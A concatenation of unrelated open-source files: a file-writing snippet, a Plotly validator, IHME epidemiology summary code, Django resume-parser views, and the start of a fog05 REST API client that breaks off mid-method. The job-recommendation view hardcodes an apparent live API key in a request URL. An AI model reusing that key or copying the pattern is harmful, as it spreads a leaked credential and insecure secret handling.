| no_license | sopanshewale/python-datascience | 943b689d4264ad06f19c8039745ba6625d556282 | 0014b48d2397e16536731e1ee91e5e36f31e1ed9 | refs/heads/master | 2021-01-11T20:24:58.567677 | 2018-06-09T07:07:10 | 2018-06-09T07:07:10 | 79,097,836 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | #!/usr/bin/python3
f = open ('simple_data.txt', 'w')
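# Note: write() does not add newline characters, so the three strings below are
# written back-to-back on a single line; append "\n" to each string if separate
# lines are wanted.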
f.write("Hello to writing data into file")
f.write("Line ------2")
f.write("Line ------3")
f.close()
| [
"[email protected]"
]
| |
08614e6d097655c7c676a0336d9f847227e88e3d | 090a4e026addc9e78ed6118f09fd0d7d4d517857 | /validators/funnel/_marker.py | 475ac8c006ae087f0522dd87148fdf5d681678a6 | [
"MIT"
]
| permissive | wwwidonja/new_plotly | 0777365e53ea7d4b661880f1aa7859de19ed9b9a | 1bda35a438539a97c84a3ab3952e95e8848467bd | refs/heads/master | 2023-06-04T19:09:18.993538 | 2021-06-10T18:33:28 | 2021-06-10T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,407 | py | import _plotly_utils.basevalidators
class MarkerValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="marker", parent_name="funnel", **kwargs):
super(MarkerValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Marker"),
data_docs=kwargs.pop(
"data_docs",
"""
autocolorscale
Determines whether the colorscale is a default
palette (`autocolorscale: true`) or the palette
determined by `marker.colorscale`. Has an
effect only if in `marker.color`is set to a
numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the
default palette will be chosen according to
whether numbers in the `color` array are all
positive, all negative or mixed.
cauto
Determines whether or not the color domain is
computed with respect to the input data (here
in `marker.color`) or the bounds set in
`marker.cmin` and `marker.cmax` Has an effect
only if in `marker.color`is set to a numerical
array. Defaults to `false` when `marker.cmin`
and `marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmin` must be set as well.
cmid
Sets the mid-point of the color domain by
scaling `marker.cmin` and/or `marker.cmax` to
be equidistant to this point. Has an effect
only if in `marker.color`is set to a numerical
array. Value should have the same units as in
`marker.color`. Has no effect when
`marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmax` must be set as well.
color
                Sets the marker color. It accepts either a
specific color or an array of numbers that are
mapped to the colorscale relative to the max
and min values of the array or relative to
`marker.cmin` and `marker.cmax` if set.
coloraxis
Sets a reference to a shared color axis.
References to these shared color axes are
"coloraxis", "coloraxis2", "coloraxis3", etc.
Settings for these shared color axes are set in
the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple
color scales can be linked to the same color
axis.
colorbar
:class:`new_plotly.graph_objects.funnel.marker.Colo
rBar` instance or dict with compatible
properties
colorscale
Sets the colorscale. Has an effect only if in
`marker.color`is set to a numerical array. The
colorscale must be an array containing arrays
mapping a normalized value to an rgb, rgba,
hex, hsl, hsv, or named color string. At
minimum, a mapping for the lowest (0) and
highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in
color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may
be a palette name string of the following list:
Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,Reds,Bl
ues,Picnic,Rainbow,Portland,Jet,Hot,Blackbody,E
arth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
line
:class:`new_plotly.graph_objects.funnel.marker.Line
` instance or dict with compatible properties
opacity
Sets the opacity of the bars.
opacitysrc
Sets the source reference on Chart Studio Cloud
for opacity .
reversescale
Reverses the color mapping if true. Has an
effect only if in `marker.color`is set to a
numerical array. If true, `marker.cmin` will
correspond to the last color in the array and
`marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is
displayed for this trace. Has an effect only if
in `marker.color`is set to a numerical array.
""",
),
**kwargs
)
| [
"[email protected]"
]
| |
5f5c946119f93d0807da026d011f603897bc22be | 2e74c7339c63385172629eaa84680a85a4731ee9 | /functions/adding_machine/adding_machine/summarizers.py | e2c7e2177df872c5c6880129cd2080aec0c8204f | []
| no_license | zhusui/ihme-modeling | 04545182d0359adacd22984cb11c584c86e889c2 | dfd2fe2a23bd4a0799b49881cb9785f5c0512db3 | refs/heads/master | 2021-01-20T12:30:52.254363 | 2016-10-11T00:33:36 | 2016-10-11T00:33:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,857 | py | from __future__ import division
import pandas as pd
import agg_engine as ae
import os
import super_gopher
from functools32 import lru_cache
try:
from hierarchies import dbtrees
except:
from hierarchies.hierarchies import dbtrees
import numpy as np
from scipy import stats
from multiprocessing import Pool
import itertools
from db import EpiDB
this_file = os.path.abspath(__file__)
this_path = os.path.dirname(this_file)
@lru_cache()
def get_age_weights():
query = """
SELECT age_group_id, age_group_weight_value
FROM shared.age_group_weight
WHERE gbd_round_id = 3"""
db = EpiDB('epi')
eng = db.get_engine(db.dsn_name)
aws = pd.read_sql(query, eng)
return aws
@lru_cache()
def get_age_spans():
query = """
SELECT age_group_id, age_group_years_start, age_group_years_end
FROM shared.age_group"""
db = EpiDB('epi')
eng = db.get_engine(db.dsn_name)
ags = pd.read_sql(query, eng)
return ags
def get_pop(filters={}):
query = """
SELECT o.age_group_id, year_id, o.location_id, o.sex_id, pop_scaled
FROM mortality.output o
LEFT JOIN mortality.output_version ov using (output_version_id)
LEFT JOIN shared.age_group a using (age_group_id)
LEFT JOIN shared.location l using (location_id)
LEFT JOIN shared.sex s using (sex_id)
WHERE ov.is_best = 1
AND year_id >= 1980 AND year_id <= 2015"""
for k, v in filters.iteritems():
v = np.atleast_1d(v)
v = [str(i) for i in v]
query = query + " AND {k} IN ({vlist})".format(
k=k, vlist=",".join(v))
db = EpiDB('cod')
eng = db.get_engine(db.dsn_name)
pop = pd.read_sql(query, eng)
return pop
def combine_sexes_indf(df):
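    # Combines sex-specific draws into a both-sexes (sex_id = 3) row using a
    # population-weighted ('wtd_sum') aggregation over the sex dimension.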
draw_cols = list(df.filter(like='draw').columns)
index_cols = list(set(df.columns) - set(draw_cols))
index_cols.remove('sex_id')
csdf = df.merge(
pop,
on=['location_id', 'year_id', 'age_group_id', 'sex_id'])
# assert len(csdf) == len(df), "Uh oh, some pops are missing..."
csdf = ae.aggregate(
csdf[index_cols+draw_cols+['pop_scaled']],
draw_cols,
index_cols,
'wtd_sum',
weight_col='pop_scaled')
csdf['sex_id'] = 3
return csdf
def combine_ages(df, gbd_compare_ags=False):
age_groups = {
22: (0, 200),
27: (0, 200)}
if gbd_compare_ags:
age_groups.update({
1: (0, 5),
23: (5, 15),
24: (15, 50),
25: (50, 70),
26: (70, 200)})
index_cols = ['location_id', 'year_id', 'measure_id', 'sex_id']
if 'cause_id' in df.columns:
index_cols.append('cause_id')
if 'sequela_id' in df.columns:
index_cols.append('sequela_id')
if 'rei_id' in df.columns:
index_cols.append('rei_id')
draw_cols = list(df.filter(like='draw').columns)
results = []
for age_group_id, span in age_groups.items():
if age_group_id in df.age_group_id.unique():
continue
# Get aggregate age cases
if age_group_id != 27:
wc = 'pop_scaled'
aadf = df.merge(ags)
aadf = aadf[
(span[0] <= aadf.age_group_years_start) &
(span[1] >= aadf.age_group_years_end)]
aadf.drop(
['age_group_years_start', 'age_group_years_end'],
axis=1,
inplace=True)
len_in = len(aadf)
aadf = aadf.merge(
pop,
on=['location_id', 'year_id', 'age_group_id', 'sex_id'],
how='left')
assert len(aadf) == len_in, "Uh oh, some pops are missing..."
else:
wc = 'age_group_weight_value'
aadf = df.merge(aw, on='age_group_id', how='left')
assert len(aadf) == len(df), "Uh oh, some weights are missing..."
aadf = ae.aggregate(
aadf[index_cols+draw_cols+[wc]],
draw_cols,
index_cols,
'wtd_sum',
weight_col=wc)
aadf['age_group_id'] = age_group_id
results.append(aadf)
results = pd.concat(results)
return results
def get_estimates(df):
""" Compute summaries """
summdf = df.copy()
summdf['mean'] = summdf.filter(like='draw').mean(axis=1)
summdf['median'] = np.median(
summdf.filter(like='draw').values,
axis=1)
summdf['lower'] = stats.scoreatpercentile(
summdf.filter(like='draw').values,
per=2.5,
axis=1)
summdf['upper'] = stats.scoreatpercentile(
summdf.filter(like='draw').values,
per=97.5,
axis=1)
nondraw_cols = set(summdf.columns)-set(summdf.filter(like='draw').columns)
return summdf[list(nondraw_cols)]
def pct_change(df, start_year, end_year, change_type='pct_change',
index_cols=None):
""" Compute pct change: either arc or regular pct_change (rate or num).
For pct_change in rates or arc pass in a df in rate space.
Otherwise, pass in a df in count space."""
# set up the incoming df to be passed into the math part
draw_cols = list(df.filter(like='draw').columns)
if not index_cols:
index_cols = list(set(df.columns) - set(draw_cols + ['year_id']))
df_s = df[df.year_id == start_year]
df_e = df[df.year_id == end_year]
df_s.drop('year_id', axis=1, inplace=True)
df_e.drop('year_id', axis=1, inplace=True)
df_s = df_s.merge(
df_e,
on=index_cols,
suffixes=(str(start_year), str(end_year)))
sdraws = ['draw_%s%s' % (d, start_year) for d in range(1000)]
edraws = ['draw_%s%s' % (d, end_year) for d in range(1000)]
# do the math
if change_type == 'pct_change':
cdraws = ((df_s[edraws].values - df_s[sdraws].values) /
df_s[sdraws].values)
emean = df_s[edraws].values.mean(axis=1)
smean = df_s[sdraws].values.mean(axis=1)
cmean = (emean - smean) / smean
# when any start year values are 0, we get division by zero = NaN/inf
cdraws[np.isnan(cdraws)] = 0
cdraws[np.isinf(cdraws)] = 0
cmean[np.isnan(cmean)] = 0
cmean[np.isinf(cmean)] = 0
elif change_type == 'arc':
# can't take a log of 0, so replace 0 with a miniscule number
adraws = sdraws + edraws
if (df_s[adraws].values == 0).any():
df_s[adraws] = df_s[adraws].replace(0, 1e-9)
gap = end_year - start_year
cdraws = np.log(df_s[edraws].values / df_s[sdraws].values) / gap
emean = df_s[edraws].values.mean(axis=1)
smean = df_s[sdraws].values.mean(axis=1)
cmean = np.log(emean / smean) / gap
else:
raise ValueError("change_type must be 'pct_change' or 'arc'")
# put the dataframes back together
cdraws = pd.DataFrame(cdraws, index=df_s.index, columns=draw_cols)
cdraws = cdraws.join(df_s[index_cols])
cmean = pd.DataFrame(cmean, index=df_s.index, columns=['pct_change_means'])
cdraws = cdraws.join(cmean)
cdraws['year_start_id'] = start_year
cdraws['year_end_id'] = end_year
cdraws = cdraws[
index_cols +
['year_start_id', 'year_end_id', 'pct_change_means'] +
draw_cols]
# output
return cdraws
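# Illustrative call (an assumption, not part of the original module): given
# draw-level rates `df` covering year_id 1990 and 2015,
#     change = pct_change(df, 1990, 2015, change_type='arc')
# returns one row per remaining index combination with annualized rate-of-change
# draws plus a 'pct_change_means' column.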
def transform_metric(df, to_id, from_id):
"""Given a df, it's current metric_id (from_id)
and it's desired metric_id (to_id), transform metric space!"""
to_id = int(to_id)
from_id = int(from_id)
# TODO: Expand this for the other metrics too.
    # Right now just doing number and rate for the get_pct_change shared fn.
valid_to = [1, 3]
assert to_id in valid_to, "Pass either 1 or 3 for the 'to_id' arg"
valid_from = [1, 3]
assert from_id in valid_from, "Pass either 1 or 3 for the 'from_id' arg"
merge_cols = ['location_id', 'year_id', 'age_group_id', 'sex_id']
if not df.index.is_integer:
df.reset_index(inplace=True)
for col in merge_cols:
assert col in df.columns, "Df must contain %s" % col
# find years and sexes in the df
years = df.year_id.unique()
sexes = df.sex_id.unique()
ages = df.age_group_id.unique()
locations = df.location_id.unique()
# get populations for those years and sexes
pop = get_pop({'year_id': years, 'sex_id': sexes,
'age_group_id': ages, 'location_id': locations})
# transform
draw_cols = list(df.filter(like='draw').columns)
new_df = df.merge(pop, on=merge_cols, how='inner')
if (to_id == 3 and from_id == 1):
for i in draw_cols:
new_df['%s' % i] = new_df['%s' % i] / new_df['pop_scaled']
elif (to_id == 1 and from_id == 3):
for i in draw_cols:
new_df['%s' % i] = new_df['%s' % i] * new_df['pop_scaled']
else:
raise ValueError("'to_id' and 'from_id' must be two unique numbers")
# put the dfs back together
if 'metric_id' in new_df.columns:
new_df['metric_id'].replace(from_id, to_id, axis=1, inplace=True)
else:
new_df['metric_id'] = to_id
new_df.drop('pop_scaled', axis=1, inplace=True)
return new_df
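# Illustrative call (an assumption): transform_metric(df, to_id=1, from_id=3)
# converts rate draws to counts by multiplying each draw by pop_scaled for the
# matching location/year/age/sex, and stamps metric_id = 1 on the result.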
def summarize_location(
location_id,
drawdir,
sg=None,
years=[1990, 1995, 2000, 2005, 2010, 2015],
change_intervals=None,
combine_sexes=False,
force_age=False,
draw_filters={},
calc_counts=False,
gbd_compare_ags=False):
drawcols = ['draw_%s' % i for i in range(1000)]
if sg is None:
spec = super_gopher.known_specs[2]
sg = super_gopher.SuperGopher(spec, drawdir)
if change_intervals:
change_years = [i for i in itertools.chain(*change_intervals)]
else:
change_years = []
change_df = []
summary = []
for y in years:
df = sg.content(
location_id=location_id, year_id=y, sex_id=[1, 2],
**draw_filters)
if force_age:
df = df[df.age_group_id.isin(range(2, 22))]
if combine_sexes:
df = df[df.sex_id != 3]
cs = combine_sexes_indf(df)
df = df.append(cs)
df = df.append(combine_ages(df, gbd_compare_ags))
df['metric_id'] = 3
if ('cause_id' in df.columns) and ('rei_id' not in df.columns):
denom = df.ix[df.cause_id == 294].drop('cause_id', axis=1)
if len(denom) > 0:
mcols = list(set(denom.columns)-set(drawcols))
pctdf = df.merge(denom, on=mcols, suffixes=('_num', '_dnm'))
num = pctdf.filter(like="_num").values
dnm = pctdf.filter(like="_dnm").values
pctdf = pctdf.reset_index(drop=True)
pctdf = pctdf.join(pd.DataFrame(
data=num/dnm, index=pctdf.index, columns=drawcols))
pctdf = pctdf[mcols+['cause_id']+drawcols]
pctdf['metric_id'] = 2
df = pd.concat([df, pctdf])
if calc_counts:
popdf = df[df.metric_id == 3].merge(pop)
popdf['metric_id'] = 1
popdf.ix[:, drawcols] = (
popdf[drawcols].values.T * popdf.pop_scaled.values).T
popdf.drop('pop_scaled', axis=1, inplace=True)
summary.append(get_estimates(popdf))
summary.append(get_estimates(df))
if y in change_years:
change_df.append(df)
if calc_counts:
change_df.append(popdf)
summary = pd.concat(summary)
if change_intervals is not None:
change_df = pd.concat(change_df)
changesumms = []
for ci in change_intervals:
changedf = pct_change(change_df, ci[0], ci[1])
changesumms.append(get_estimates(changedf))
changesumms = pd.concat(changesumms)
changesumms['median'] = changesumms['pct_change_means']
else:
changesumms = pd.DataFrame()
return summary, changesumms
def slw(args):
try:
s, cs = summarize_location(*args[0], **args[1])
return s, cs
except Exception, e:
print args
print e
return None
def launch_summaries(
model_version_id,
env='dev',
years=[1990, 1995, 2000, 2005, 2010, 2015],
file_pattern='all_draws.h5',
h5_tablename='draws'):
global pop, aw, ags
pop = get_pop()
aw = get_age_weights()
ags = get_age_spans()
drawdir = '/ihme/epi/panda_cascade/%s/%s/full/draws' % (
env, model_version_id)
outdir = '/ihme/epi/panda_cascade/%s/%s/full/summaries' % (
env, model_version_id)
try:
os.makedirs(outdir)
os.chmod(outdir, 0o775)
os.chmod(os.path.join(outdir, '..'), 0o775)
os.chmod(os.path.join(outdir, '..', '..'), 0o775)
except:
pass
lt = dbtrees.loctree(None, location_set_id=35)
locs = [l.id for l in lt.nodes]
sg = super_gopher.SuperGopher({
'file_pattern': file_pattern,
'h5_tablename': h5_tablename},
drawdir)
pool = Pool(10)
res = pool.map(slw, [(
(l, drawdir, sg, years), {}) for l in locs])
pool.close()
pool.join()
res = [r for r in res if isinstance(r, tuple)]
res = zip(*res)
summ = pd.concat([r for r in res[0] if r is not None])
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'mean', 'lower', 'upper']]
summfile = "%s/model_estimate_final.csv" % outdir
summ.to_csv(summfile, index=False)
os.chmod(summfile, 0o775)
csumm = pd.concat(res[1])
if len(csumm) > 0:
csumm = csumm[[
'location_id', 'year_start', 'year_end', 'age_group_id', 'sex_id',
'measure_id', 'median', 'lower', 'upper']]
csummfile = "%s/change_summaries.csv" % outdir
csumm.to_csv(csummfile, index=False)
os.chmod(csummfile, 0o775)
def summ_lvl_meas(args):
drawdir, outdir, location_id, measure_id = args
try:
os.makedirs(outdir)
os.chmod(outdir, 0o775)
os.chmod(os.path.join(outdir, '..'), 0o775)
os.chmod(os.path.join(outdir, '..', '..'), 0o775)
except:
pass
try:
sg = super_gopher.SuperGopher({
'file_pattern': '{measure_id}_{location_id}_{year_id}_{sex_id}.h5',
'h5_tablename': 'draws'},
drawdir)
print 'Combining summaries %s %s...' % (drawdir, measure_id)
summ, csumm = summarize_location(
location_id,
drawdir,
sg,
change_intervals=[(2005, 2015), (1990, 2015), (1990, 2005)],
combine_sexes=True,
force_age=True,
calc_counts=True,
draw_filters={'measure_id': measure_id},
gbd_compare_ags=True)
if 'cause' in drawdir:
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'metric_id', 'cause_id', 'mean', 'lower',
'upper']]
summ = summ.sort_values([
'measure_id', 'year_id', 'location_id', 'sex_id',
'age_group_id', 'cause_id', 'metric_id'])
elif 'sequela' in drawdir:
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'metric_id', 'sequela_id', 'mean', 'lower',
'upper']]
summ = summ.sort_values([
'measure_id', 'year_id', 'location_id', 'sex_id',
'age_group_id', 'sequela_id', 'metric_id'])
elif 'rei' in drawdir:
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'metric_id', 'rei_id', 'cause_id', 'mean',
'lower', 'upper']]
summ = summ.sort_values([
'measure_id', 'year_id', 'location_id', 'sex_id',
'age_group_id', 'rei_id', 'cause_id', 'metric_id'])
summfile = "%s/%s_%s_single_year.csv" % (
outdir, measure_id, location_id)
print 'Writing to file...'
summ = summ[summ['mean'].notnull()]
summ.to_csv(summfile, index=False)
os.chmod(summfile, 0o775)
if len(csumm) > 0:
if 'cause' in drawdir:
csumm = csumm[[
'location_id', 'year_start_id', 'year_end_id',
'age_group_id', 'sex_id', 'measure_id', 'cause_id',
'metric_id', 'median', 'lower', 'upper']]
csumm = csumm.sort_values([
'measure_id', 'year_start_id', 'year_end_id',
'location_id', 'sex_id', 'age_group_id', 'cause_id',
'metric_id'])
elif 'sequela' in drawdir:
csumm = csumm[[
'location_id', 'year_start_id', 'year_end_id',
'age_group_id', 'sex_id', 'measure_id', 'sequela_id',
'metric_id', 'median', 'lower', 'upper']]
csumm = csumm.sort_values([
'measure_id', 'year_start_id', 'year_end_id',
'location_id', 'sex_id', 'age_group_id', 'sequela_id',
'metric_id'])
elif 'rei' in drawdir:
csumm = csumm[[
'location_id', 'year_start_id', 'year_end_id',
'age_group_id', 'sex_id', 'measure_id', 'rei_id',
'cause_id', 'metric_id', 'median', 'lower', 'upper']]
csumm = csumm.sort_values([
'measure_id', 'year_start_id', 'year_end_id',
'location_id', 'sex_id', 'age_group_id', 'rei_id',
'cause_id', 'metric_id'])
csummfile = "%s/%s_%s_multi_year.csv" % (
outdir, measure_id, location_id)
csumm = csumm[
(csumm['median'].notnull()) & np.isfinite(csumm['median']) &
(csumm['lower'].notnull()) & np.isfinite(csumm['lower']) &
(csumm['upper'].notnull()) & np.isfinite(csumm['upper'])]
csumm.to_csv(csummfile, index=False)
os.chmod(csummfile, 0o775)
except Exception as e:
print e
def launch_summaries_como(draw_out_dirmap, location_id):
global pop, aw, ags
pop = get_pop({'location_id': location_id})
aw = get_age_weights()
ags = get_age_spans()
arglist = [(d, o, location_id, measure_id)
for d, o in draw_out_dirmap.iteritems()
for measure_id in [3, 5, 6, 22, 23, 24]]
pool = Pool(len(draw_out_dirmap)*3)
pool.map(summ_lvl_meas, arglist, chunksize=1)
pool.close()
pool.join()
| [
"[email protected]"
]
| |
ce4db0d1eefa29d48921b8c480811378e92db97a | b943d3c32cac2b4d9ab85753c0a611688fba82ad | /resume_parser/parser_app/views.py | 3379793d2e341273319f0dea8815914b786cd1c5 | [
"MIT"
]
| permissive | ashokraman/ResumeParser | 787e0d5fdc560c35630c1a78411e28725812a737 | 2238b7f3ea955f04cf5ccda619a15f62fcf066e3 | refs/heads/master | 2020-06-20T13:16:49.115304 | 2019-07-04T05:38:26 | 2019-07-04T05:38:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,190 | py | from django.shortcuts import render, redirect
from resume_parser import resume_parser
from .models import UserDetails, Competencies, MeasurableResults, Resume, ResumeDetails, UploadResumeModelForm
from django.contrib.auth.models import User
from django.contrib import messages
from django.conf import settings
from django.db import IntegrityError
from django.http import HttpResponse, FileResponse, Http404, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from .serializers import UserDetailsSerializer, CompetenciesSerializer, MeasurableResultsSerializer, ResumeSerializer, ResumeDetailsSerializer
import os
import requests
def homepage(request):
if request.method == 'POST':
user = User.objects.get(id=1)
UserDetails.objects.filter(user=user).delete()
Competencies.objects.filter(user=user).delete()
MeasurableResults.objects.filter(user=user).delete()
Resume.objects.filter(user=user).delete()
ResumeDetails.objects.filter(resume__user=user).delete()
file_form = UploadResumeModelForm(request.POST, request.FILES)
files = request.FILES.getlist('resume')
if file_form.is_valid():
for file in files:
try:
user = User.objects.get(id=1)
# saving the file
resume = Resume(user=user, resume=file)
resume.save()
# extracting resume entities
parser = resume_parser.ResumeParser(os.path.join(settings.MEDIA_ROOT, resume.resume.name))
data = parser.get_extracted_data()
# User Details
# resume.name = data.get('name')
# resume.email = data.get('email')
# resume.education = get_education(data.get('education'))
user_details = UserDetails()
user_details.user = user
user_details.name = data.get('name')
user_details.email = data.get('email')
user_details.mobile_number = data.get('mobile_number')
user_details.skills = ', '.join(data.get('skills'))
user_details.years_of_exp = data.get('total_experience')
user_details.save()
for comp in data.get('competencies'):
competencies = Competencies()
competencies.user = user
competencies.competency = comp
competencies.save()
for mr in data.get('measurable_results'):
measurable_results = MeasurableResults()
measurable_results.user = user
measurable_results.measurable_result = mr
measurable_results.save()
# Resume Details
resume_details = ResumeDetails()
resume_details.resume = resume
resume_details.page_nos = data.get('no_of_pages')
resume_details.save()
# resume.experience = ', '.join(data.get('experience'))
# measurable_results.append(data.get('measurable_results'))
# resume.save()
except IntegrityError:
                    messages.warning(request, 'Duplicate resume found: ' + file.name)
return redirect('homepage')
resumes = Resume.objects.filter(user=User.objects.get(id=1))
user_detail = UserDetails.objects.get(user=user)
messages.success(request, 'Resumes uploaded!')
overall_score = 0
competencies = data.get('competencies')
measurable_results = data.get('measurable_results')
if competencies and measurable_results:
overall_score = competencies.get('score') + measurable_results.get('score')
if competencies:
context = {
'resumes': resumes,
'competencies': competencies,
'measurable_results': measurable_results,
'no_of_pages': data.get('no_of_pages'),
'total_experience': data.get('total_experience'),
'user_details': user_detail,
'overall_score': overall_score
}
else:
context = {
'resumes': resumes,
'competencies': [],
'measurable_results': [],
'no_of_pages': data.get('no_of_pages'),
'total_experience': data.get('total_experience'),
'user_details': user_detail,
'overall_score': overall_score
}
return render(request, 'base.html', context)
else:
form = UploadResumeModelForm()
return render(request, 'base.html', {'form': form})
def get_education(education):
'''
Helper function to display the education in human readable format
'''
education_string = ''
for edu in education:
education_string += edu[0] + ' (' + str(edu[1]) + '), '
return education_string.rstrip(', ')
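# Illustrative example of get_education (degree names and years below are hypothetical):
#   get_education([('B.Tech', 2016), ('M.Tech', 2018)])
#   -> 'B.Tech (2016), M.Tech (2018)'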
@csrf_exempt
def user_detail(request, pk):
"""
    Retrieve the stored user details, competencies, measurable results and resume info for a user.
"""
try:
user = User.objects.get(pk=pk)
user_details = UserDetails.objects.get(user=user)
comp = Competencies.objects.filter(user=user)
mr = MeasurableResults.objects.filter(user=user)
resume = Resume.objects.get(user=user)
resume_details = ResumeDetails.objects.filter(resume=resume)
except UserDetails.DoesNotExist:
return HttpResponse(status=404)
except Competencies.DoesNotExist:
return HttpResponse(status=404)
if request.method == 'GET':
comp_serializer = CompetenciesSerializer(comp, many=True)
mr_serializer = MeasurableResultsSerializer(mr, many=True)
resume_serializer = ResumeSerializer(resume)
resume_details_serializer = ResumeDetailsSerializer(resume_details, many=True)
user_details_serializer = UserDetailsSerializer(user_details)
data = {}
data['competencies'] = comp_serializer.data
data['measurable_results'] = mr_serializer.data
data['resume'] = resume_serializer.data
data['resume_details'] = resume_details_serializer.data
data['user_details'] = user_details_serializer.data
return JsonResponse(data)
@csrf_exempt
def job_recommendation(request):
if request.method == 'POST':
job_title = request.POST.get('job_title')
job_location = request.POST.get('job_location')
data = requests.get('https://api.ziprecruiter.com/jobs/v1?search=Python&location=Santa%20Monica&api_key=mqpqz4ev44nfu3n9brazrrix27yzipzm').json()
return JsonResponse(data) | [
"[email protected]"
]
| |
1bb398a7369351058579f2038fcb6b751f225a55 | f6b3d08c885d6265a90b8323e9633cd1eae9d15d | /fog05/web_api.py | e0106d9fc772dc61ee4643cf731c81a9ccbcca32 | [
"Apache-2.0"
]
| permissive | kartben/fog05 | ed3c3834c574c1e9d13aea8129fd251cea7d63a2 | b2f6557772c9feaf9d6a9ad5997b5c2206527c91 | refs/heads/master | 2020-03-18T21:21:27.633610 | 2018-05-23T09:25:50 | 2018-05-23T09:25:50 | 135,276,221 | 0 | 0 | null | 2018-05-29T09:54:48 | 2018-05-29T09:54:47 | null | UTF-8 | Python | false | false | 34,780 | py | from jsonschema import validate, ValidationError
from fog05 import Schemas
from dstore import Store
from enum import Enum
import re
import uuid
import json
import fnmatch
import time
import urllib3
import requests
class RESTStore(object):
def __init__(self, root, host, port):
self.root = root
self.host = host
self.port = port
def get(self, uri):
endpoint = "http://{}:{}/get/{}".format(self.host, self.port, uri)
resp = requests.get(endpoint)
return json.loads(resp.text)
def resolve(self, uri):
return self.get(uri)
def put(self, uri, value):
endpoint = "http://{}:{}/put/{}".format(self.host, self.port, uri)
resp = requests.put(endpoint, data={'value': value})
return json.loads(resp.text)
def dput(self, uri, value=None):
if value is None:
value = self.args2dict(uri.split('#')[-1])
endpoint = "http://{}:{}/dput/{}".format(self.host, self.port, uri)
resp = requests.patch(endpoint, data={'value': value})
return json.loads(resp.text)
def getAll(self, uri):
return self.get(uri)
def resolveAll(self, uri):
return self.get(uri)
def remove(self, uri):
endpoint = "http://{}:{}/remove/{}".format(self.host, self.port, uri)
resp = requests.delete(endpoint)
return json.loads(resp.text)
def dot2dict(self, dot_notation, value=None):
ld = []
tokens = dot_notation.split('.')
n_tokens = len(tokens)
for i in range(n_tokens, 0, -1):
if i == n_tokens and value is not None:
ld.append({tokens[i - 1]: value})
else:
ld.append({tokens[i - 1]: ld[-1]})
return ld[-1]
def args2dict(self, values):
data = {}
uri_values = values.split('&')
for tokens in uri_values:
v = tokens.split('=')[-1]
k = tokens.split('=')[0]
if len(k.split('.')) < 2:
data.update({k: v})
else:
d = self.dot2dict(k, v)
data.update(d)
return data
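    # Illustrative sketch of the dot/ampersand helpers above (keys and values are hypothetical):
    #   dot2dict('cpu.arch', 'x86_64')         -> {'cpu': {'arch': 'x86_64'}}
    #   args2dict('status=run&os.name=linux')  -> {'status': 'run', 'os': {'name': 'linux'}}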
class FOSRESTStore(object):
"Helper class to interact with the Store"
def __init__(self, host, port, aroot, droot):
self.aroot = aroot
self.droot = droot
self.actual = RESTStore(aroot, host, port)
self.desired = RESTStore(droot, host, port)
def close(self):
'''
Close the store
:return: None
'''
return None
class WebAPI(object):
'''
    This class allows interaction with fog05 using a simple Python 3 API
    It needs the distributed store
'''
def __init__(self, host, port, sysid=0, store_id="python-api-rest"):
self.a_root = 'afos://{}'.format(sysid)
self.d_root = 'dfos://{}'.format(sysid)
self.store = FOSRESTStore(host, port, self.a_root, self.d_root)
self.manifest = self.Manifest(self.store)
self.node = self.Node(self.store)
self.plugin = self.Plugin(self.store)
self.network = self.Network(self.store)
self.entity = self.Entity(self.store)
self.image = self.Image(self.store)
self.flavor = self.Flavor(self.store)
class Manifest(object):
'''
This class encapsulates API for manifests
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def check(self, manifest, manifest_type):
'''
            This method allows you to check whether a manifest is written correctly
            :param manifest: a dictionary representing the JSON manifest
:param manifest_type: the manifest type from API.Manifest.Type
:return: boolean
'''
if manifest_type == self.Type.ENTITY:
t = manifest.get('type')
try:
if t == 'vm':
validate(manifest.get('entity_data'), Schemas.vm_schema)
elif t == 'container':
validate(manifest.get('entity_data'), Schemas.container_schema)
elif t == 'native':
validate(manifest.get('entity_data'), Schemas.native_schema)
elif t == 'ros2':
validate(manifest.get('entity_data'), Schemas.ros2_schema)
elif t == 'usvc':
return False
else:
return False
except ValidationError as ve:
return False
if manifest_type == self.Type.NETWORK:
try:
validate(manifest, Schemas.network_schema)
except ValidationError as ve:
return False
if manifest_type == self.Type.ENTITY:
try:
validate(manifest, Schemas.entity_schema)
except ValidationError as ve:
return False
return True
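        # Illustrative call (the manifest contents are hypothetical):
        #   api.manifest.check(my_entity_manifest, api.manifest.Type.ENTITY)
        #   returns True when the manifest validates against the matching schema, False otherwise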
class Type(Enum):
'''
Manifest types
'''
ENTITY = 0
IMAGE = 1
FLAVOR = 3
NETWORK = 4
PLUGIN = 5
class Node(object):
'''
This class encapsulates the command for Node interaction
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def list(self):
'''
Get all nodes in the current system/tenant
:return: list of tuples (uuid, hostname)
'''
nodes = []
